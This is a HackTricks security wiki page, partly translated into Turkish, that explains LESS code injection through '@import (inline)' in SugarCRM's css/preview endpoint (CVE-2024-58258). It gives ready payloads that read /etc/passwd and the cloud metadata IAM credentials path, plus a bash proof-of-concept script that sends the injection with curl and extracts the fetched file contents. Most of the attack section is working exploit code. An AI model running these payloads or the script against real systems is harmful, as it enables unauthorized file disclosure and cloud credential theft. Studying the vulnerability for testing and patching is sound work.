LESS Code Injection leading to SSRF & Local File Read

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation the LESS engine will fetch the resources referenced in @import statements and embed (“inline”) their contents into the resulting CSS when the (inline) option is used.

When an application concatenates user-controlled input into a string that is later parsed by the LESS compiler, an attacker can inject arbitrary LESS code. By abusing @import (inline) the attacker can force the server to retrieve:

• Local files via the file:// protocol (information disclosure / Local File Inclusion).
• Remote resources on internal networks or cloud metadata services (SSRF).

This technique has been seen in real-world products such as SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploitation

1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. ?lm= in SugarCRM).
2. Close the current statement and inject new directives. The most common primitives are:

• ; – önceki deklarasyonu sonlandırır.
• } – önceki bloğu kapatır (gerekirse).

3. Use @import (inline) '<URL>'; to read arbitrary resources.
4. Optionally inject a marker (data: URI) after the import to ease extraction of the fetched content from the compiled CSS.

Local File Read

1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //

/etc/passwd içeriği HTTP yanıtında @@END@@ işaretçisinden hemen önce görünecektir.

SSRF – Bulut meta verisi

1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //

Otomatik PoC (SugarCRM örneği)

#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd

TARGET="$1"        # Base URL of SugarCRM instance
RESOURCE="$2"      # file:// path or URL to fetch

INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")

curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'

Gerçek Dünya Vakaları

Referanslar

• SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability
• SugarCRM Security Advisory SA-2024-059
• CVE-2024-58258

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.